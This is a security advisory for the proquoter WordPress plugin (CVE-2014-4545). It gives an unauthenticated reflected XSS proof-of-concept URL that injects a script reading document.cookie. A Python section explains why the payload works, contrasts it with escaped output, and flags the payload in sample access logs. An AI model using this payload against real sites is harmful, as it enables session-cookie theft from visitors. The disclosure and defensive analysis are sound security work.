wp-plugin : proquoter – A3-Cross-Site Scripting (XSS)

Plugin Details

Plugin Name : proquoter

Affected Version : 1.0 (and most probably lower versions, if any)

Vulnerability : A3-Cross-Site Scripting (XSS)

Identified by : Prajal Kulkarni

Technical Details

Minimum Level of Access Required : Unauthenticated

PoC (Proof of Concept) :

http://localhost/wordpress/wp-content/wp-plugs/proquoter/pq_dialog.php?leftorright=leftorright%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&author=author%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
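The PoC above reflects the `leftorright` and `author` query parameters of `pq_dialog.php` into HTML attributes without escaping: `%22%3E` (`">`) closes a double-quoted attribute and `%27%3E` (`'>`) closes a single-quoted one, after which the `<script>` element is injected. The following Python example is added here and is not part of the advisory or of the proquoter plugin; the rendering template it uses is an assumption about the plugin's output (the real pq_dialog.php was not inspected), and the access-log lines are constructed. It decodes the PoC the way PHP's `$_GET` would, renders the parameters both unescaped and with attribute-context escaping (the Python equivalent of WordPress's `esc_attr()`), and runs a simple detector over log lines for requests to `pq_dialog.php` whose decoded parameters contain markup characters.

```python
import re
from html import escape
from urllib.parse import urlparse, parse_qs

# PoC URL quoted in the advisory (hostname typo corrected).
POC_URL = ("http://localhost/wordpress/wp-content/wp-plugs/proquoter/pq_dialog.php"
           "?leftorright=leftorright%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E"
           "&author=author%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&")

# Assumed markup: the plugin echoes each parameter into an attribute, one
# double-quoted and one single-quoted, which is what the two PoC payloads target.
TEMPLATE = ('<input name="leftorright" value="%s">'
            "<input name='author' value='%s'>")


def query_params(url):
    """Decode the query string as PHP's $_GET would (first value per key)."""
    qs = parse_qs(urlparse(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in qs.items()}


def render_vulnerable(params):
    """Raw values concatenated into attributes: the vulnerable pattern."""
    return TEMPLATE % (params.get("leftorright", ""), params.get("author", ""))


def render_hardened(params):
    """Attribute-context escaping: html.escape(quote=True) encodes <, >, &, " and ',
    so neither payload can terminate its attribute or open a new element."""
    return TEMPLATE % (escape(params.get("leftorright", ""), quote=True),
                       escape(params.get("author", ""), quote=True))


def opens_script_element(html):
    """Oracle used by the test: a script element appears in the rendered output."""
    return "<script" in html.lower()


# Constructed access-log lines (not from any real server); the second one
# carries the advisory's leftorright payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Apr/2014:10:00:00 +0000] "GET /wp-content/wp-plugs/proquoter/'
    'pq_dialog.php?leftorright=left&author=jane HTTP/1.1" 200 512',
    '10.0.0.9 - - [25/Apr/2014:10:00:01 +0000] "GET /wp-content/wp-plugs/proquoter/'
    'pq_dialog.php?leftorright=leftorright%22%3E%3Cscript%3Ealert%28document.cookie%29'
    '%3C/script%3E HTTP/1.1" 200 640',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP')


def suspicious_requests(log_lines):
    """Return log lines whose decoded pq_dialog.php parameters contain < or >.
    Matching on decoded values catches %3C/%3E encodings that a raw substring
    search for '<script' would miss."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m or "pq_dialog.php" not in m.group(1):
            continue
        params = query_params("http://host" + m.group(1))
        if any(ch in value for value in params.values() for ch in "<>"):
            hits.append(line)
    return hits


if __name__ == "__main__":
    p = query_params(POC_URL)
    print("vulnerable:", render_vulnerable(p))
    print("hardened:  ", render_hardened(p))
    print("flagged log lines:", len(suspicious_requests(SAMPLE_LOG)))
```

The detector deliberately ignores quote characters on their own, since a legitimate author name such as O'Brien would otherwise be flagged; the escaping in `render_hardened` is what actually removes the risk, the detector only helps confirm whether the flaw was probed on an unpatched site.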

Disclosure Timeline

Vendor Contacted : 2014-01-22

Plugin Status : Closed on 2014-01-11

Public Disclosure : April 25, 2014

CVE Number : CVE-2014-4545

Plugin Description :

ProQuoter allows you to easily create beautiful pull-quote images for your articles. Pull-quotes have an amazing ability to draw the reader's attention. They can turn a dull piece of text into an incredible visually stimulating article. If you don't have any exciting images to spice up your article then they can be even more important. Now it's easy to create incredibly beautiful pull quotes in your blog entry.

Just highlight the text you want to use and click one of the ProQuoter toolbar buttons and you will be able to select from 1000s of styles for your pull-quote. It only takes a few seconds to add beautiful quote images to your blog post and increase your traffic from Pinterest.

Images are generated and hosted by our website http://quotes.prowritingaid.com but you are free to download them and host them yourself if you so wish. On our website you will find over 100,000 pre-made, beautiful quote images to choose from including: funny quotes, inspirational quotes, motivational quotes, love quotes and more.
